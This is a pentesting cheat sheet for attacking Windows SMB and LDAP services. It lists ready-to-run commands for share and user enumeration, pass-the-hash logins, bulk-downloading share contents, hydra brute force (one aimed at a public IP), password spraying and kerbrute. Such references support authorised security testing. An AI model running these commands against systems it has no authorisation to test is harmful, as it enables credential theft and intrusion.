pwny.cc
External Recon

SMB

Ports: 137 (UDP), 139, 445.

Basic SMB enumeration

#Enum4linux
enum4linux -a 10.10.10.19 #Without user
enum4linux -a 10.10.10.19 -u Administrator -p Pass123 #Having user

#Rpcclient
rpcclient -U "" -N 10.10.10.19 #No creds
rpcclient -U Administrator 10.10.10.19 #Asks for password
rpcclient -U Administrator --pw-nt-hash 10.10.10.19 #Asks for NTLM hash

#Nmap
nmap --script smb-enum-users.nse -p139,445 -Pn 10.10.10.19 #Enum SMB users
nmap --script smb-enum-shares.nse -p139,445 -Pn 10.10.10.19 #Enum SMB shares

List shared folders

#Smbclient
smbclient --no-pass -L //10.10.10.19 #Null user
smbclient -U Administrator -L [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash

#Smbmap
smbmap -u "Administrator" -p "Pass123" -H 10.10.10.19 #Also works with NTLM hash

#Crackmapexec
crackmapexec smb 10.10.10.19 -u '' -p '' --shares #Null user
crackmapexec smb 10.10.10.19 -u 'Administrator' -p 'Pass123' --shares

Connect/mount shared folders

#Connect
smbclient -U Administrator [--pw-nt-hash] //10.10.10.19 #With --pw-nt-hash, the pwd provided is the NTLM hash

#Mount
mount -t cifs -o username=user,password=password //10.10.10.19/share /mnt/share

Download files from shared folders

#Smbmap
smbmap -R Folder -H 10.10.10.19 -A "passwords.txt" -q #Search file in recursive mode and download it

#Smbget
smbget smb://10.10.10.19/Disk$ -R -U "Administrator" #Download all files recursively

#Smbclient
smbclient //10.10.10.19/Disk$
> mask ""
> recurse
> prompt
> mget * #Download everything to current directory

Bruteforce on SMB

#Hydra
hydra -L users.txt -P password.txt 178.255.196.56 smb -V -t 100

#Smbrute (https://github.com/m4ll0k/SMBrute)
python3 smbrute.py -h 10.10.10.19 -U users.txt -P passwords.txt

LDAP

Ports: 389, 636 (SSL), 3268, 3269 (SSL).

Basic LDAP enumeration

#Windapsearch (https://github.com/ropnop/windapsearch)
python windapsearch.py -u Administrator -p Pass123 -d dev.corp --dc-ip 10.10.10.19

#Ad-ldap-enum (https://github.com/CroweCybersecurity/ad-ldap-enum)
python ad-ldap-enum.py -d dev.corp -l 10.10.10.19 -u Administrator -p Pass123

Bruteforce on LDAP

#Password spray (https://github.com/dafthack/DomainPasswordSpray)
Import-Module .\DomainPasswordSpray.ps1
Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

#Kerbrute (https://github.com/ropnop/kerbrute)
./kerbrute_linux_amd64 bruteuser -d evil.corp --dc 10.10.10.19 rockyou.txt Administrator #Password brute
./kerbrute_linux_amd64 userenum -d evil.corp --dc 10.10.10.19 users.txt #Username brute
./kerbrute_linux_amd64 passwordspray -d evil.corp --dc 10.10.10.19 users.txt rockyou.txt #Password spray

ldapsearch

#Append one of the -b base DNs below to the command, depending on what you want to extract
ldapsearch -x -h 10.10.10.19 -D 'dev.corp\Administrator' -w 'Pass123' <OPTION>

#Extract Users
-b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Computers
-b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract My info
-b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Domain Admins
-b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Domain Users
-b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Enterprise Admins
-b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Administrators
-b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Extract Remote Desktop Users
-b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"